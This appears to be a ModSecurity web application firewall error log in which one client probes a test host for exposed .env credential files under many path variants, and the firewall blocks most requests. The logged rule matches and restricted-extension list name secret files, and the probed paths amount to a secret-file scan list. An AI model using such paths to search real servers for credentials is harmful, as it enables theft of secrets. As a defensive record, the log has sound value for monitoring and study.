[Tue Mar 03 00:28:43.711035 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aaYdK_54XEVQxqhpP2KWkwAAAAQ"]
[Tue Mar 03 00:28:44.744858 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aaYdLP54XEVQxqhpP2KWlwAAAAQ"]
[Tue Mar 03 00:28:44.745092 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aaYdLP54XEVQxqhpP2KWlwAAAAQ"]
[Tue Mar 03 00:28:44.745307 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aaYdLP54XEVQxqhpP2KWlwAAAAQ"]
[Tue Mar 03 00:28:44.953461 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aaYdLP54XEVQxqhpP2KWmAAAAAQ"]
[Tue Mar 03 00:28:44.953692 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aaYdLP54XEVQxqhpP2KWmAAAAAQ"]
[Tue Mar 03 00:28:44.953890 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aaYdLP54XEVQxqhpP2KWmAAAAAQ"]
[Tue Mar 03 00:28:45.179543 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aaYdLf54XEVQxqhpP2KWmQAAAAQ"]
[Tue Mar 03 00:28:45.179770 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aaYdLf54XEVQxqhpP2KWmQAAAAQ"]
[Tue Mar 03 00:28:45.179969 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aaYdLf54XEVQxqhpP2KWmQAAAAQ"]
[Tue Mar 03 00:28:45.436823 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aaYdLf54XEVQxqhpP2KWmgAAAAQ"]
[Tue Mar 03 00:28:45.437060 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aaYdLf54XEVQxqhpP2KWmgAAAAQ"]
[Tue Mar 03 00:28:45.437255 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aaYdLf54XEVQxqhpP2KWmgAAAAQ"]
[Tue Mar 03 00:28:45.653881 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aaYdLf54XEVQxqhpP2KWmwAAAAQ"]
[Tue Mar 03 00:28:45.654121 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aaYdLf54XEVQxqhpP2KWmwAAAAQ"]
[Tue Mar 03 00:28:45.654322 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aaYdLf54XEVQxqhpP2KWmwAAAAQ"]
[Tue Mar 03 00:28:46.533610 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aaYdLv54XEVQxqhpP2KWngAAAAQ"]
[Tue Mar 03 00:28:46.533842 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aaYdLv54XEVQxqhpP2KWngAAAAQ"]
[Tue Mar 03 00:28:46.534059 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aaYdLv54XEVQxqhpP2KWngAAAAQ"]
[Tue Mar 03 00:28:46.753022 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aaYdLv54XEVQxqhpP2KWnwAAAAQ"]
[Tue Mar 03 00:28:46.753321 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aaYdLv54XEVQxqhpP2KWnwAAAAQ"]
[Tue Mar 03 00:28:46.753534 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aaYdLv54XEVQxqhpP2KWnwAAAAQ"]
[Tue Mar 03 00:28:46.986228 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aaYdLv54XEVQxqhpP2KWoAAAAAQ"]
[Tue Mar 03 00:28:46.986489 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aaYdLv54XEVQxqhpP2KWoAAAAAQ"]
[Tue Mar 03 00:28:46.986688 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aaYdLv54XEVQxqhpP2KWoAAAAAQ"]
[Tue Mar 03 00:28:47.108505 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aaYdL_54XEVQxqhpP2KWoQAAAAQ"]
[Tue Mar 03 00:28:47.108738 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aaYdL_54XEVQxqhpP2KWoQAAAAQ"]
[Tue Mar 03 00:28:47.108975 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aaYdL_54XEVQxqhpP2KWoQAAAAQ"]
[Tue Mar 03 00:28:47.440566 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aaYdL_54XEVQxqhpP2KWogAAAAQ"]
[Tue Mar 03 00:28:47.440815 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aaYdL_54XEVQxqhpP2KWogAAAAQ"]
[Tue Mar 03 00:28:47.441379 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aaYdL_54XEVQxqhpP2KWogAAAAQ"]
[Tue Mar 03 00:28:49.529968 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aaYdMf54XEVQxqhpP2KWpAAAAAQ"]
[Tue Mar 03 00:28:49.530090 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aaYdMf54XEVQxqhpP2KWpAAAAAQ"]
[Tue Mar 03 00:28:49.530300 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aaYdMf54XEVQxqhpP2KWpAAAAAQ"]
[Tue Mar 03 00:28:49.530548 2026] [:error] [pid 2439862] [client 195.178.110.33:57914] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aaYdMf54XEVQxqhpP2KWpAAAAAQ"]
[Tue Mar 03 00:29:04.338757 2026] [:error] [pid 2439865] [client 195.178.110.33:42766] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aaYdQMjlGQsHdjofIqMrZQAAAAc"]
[Tue Mar 03 00:29:04.339017 2026] [:error] [pid 2439865] [client 195.178.110.33:42766] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aaYdQMjlGQsHdjofIqMrZQAAAAc"]
[Tue Mar 03 00:29:04.339192 2026] [:error] [pid 2439865] [client 195.178.110.33:42766] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aaYdQMjlGQsHdjofIqMrZQAAAAc"]
[Tue Mar 03 00:29:33.742171 2026] [:error] [pid 2439854] [client 195.178.110.33:46056] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aaYdXTmDqvvg871HbIU9lwAAAAY"]
